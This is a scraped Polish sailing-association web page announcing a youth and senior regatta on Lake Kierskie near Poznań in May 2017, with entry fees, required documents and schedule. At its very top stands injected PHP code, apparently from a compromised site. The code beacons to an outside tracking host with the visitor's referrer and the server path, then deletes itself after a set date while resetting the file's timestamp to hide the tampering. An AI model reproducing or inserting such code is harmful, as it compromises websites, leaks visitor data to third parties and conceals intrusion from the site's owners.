check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727466){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } REGATY WARTE POZNANIA

Witamy na stronie
Wielkopolskiego Okręgowego Związku Żeglarskiego !!!

Home Aktualności REGATY WARTE POZNANIA

ZAWIADOMIENIE O REGATACH

Żeglarski Ludowy Klub Sportowy zaprasza na - REGATY WARTE POZNANIA
Regaty będą rozgrywane na jeziorze Kierskim w dniach 13.05 – 14.05 .2017
Miejsce regat : ŻLKS Poznań ul Wilków Morskich 13.    
 
Regaty zostaną rozegrane zgodnie z przepisami regatowymi żeglarstwa WS 2017 – 2020
Regaty rozegrane zostaną w klasach: OPP, Laser Radial , Laser-4,7 Słonka .

Wpisowe do regat wynosi :
Juniorzy  30,00 zł
Seniorzy 40,00 zł
Słonka 50,00 zł
Zgłoszenia do regat w biurze klubu ŻLKS ul. Wilków Morskich 13  w dniu 13.05.2017 w godzinach 08.30 - 10.00.

Podczas procedury zgłoszeniowej w miejscu regat, obowiązuje posiadanie następujących dokumentów:
· dowód wpłaty wpisowego do regat;
· aktualne badania lekarskie
· licencja sportowa zawodnika PZŻ;
· ubezpieczenie OC na sumę gwarancyjną min. 1.000.000 EUR;
· certyfikat lub świadectwo pomiarowe zgłaszanego jachtu z ustalonym numerem klasowym;
· licencja PZŻ na reklamowanie indywidualne (jeśli dotyczy).

Planowane jest rozegranie 5 wyścigów.
Gotowość startowa w dniu 13.05. o godzinie 11:00
W dniu 14.05.2017 sygnał ostrzeżenia nie może być podany później niż o godz. 15.00
Regaty będą ważne po odbyciu 1 wyścigu.

Instrukcja żeglugi będzie dostępna podczas procedury zgłoszeniowej w biurze regat.
Dla najlepszych przewidziane są puchary i dyplomy.

Jakub Kania

 

Poznań Know How

Energa Sailing

Przeszukaj nasz serwis